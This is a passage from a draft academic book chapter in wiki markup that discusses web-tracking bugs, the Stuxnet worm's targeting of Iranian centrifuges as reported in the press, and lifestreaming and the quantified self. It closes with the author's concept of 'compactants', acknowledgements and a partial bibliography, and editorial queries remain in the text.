*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
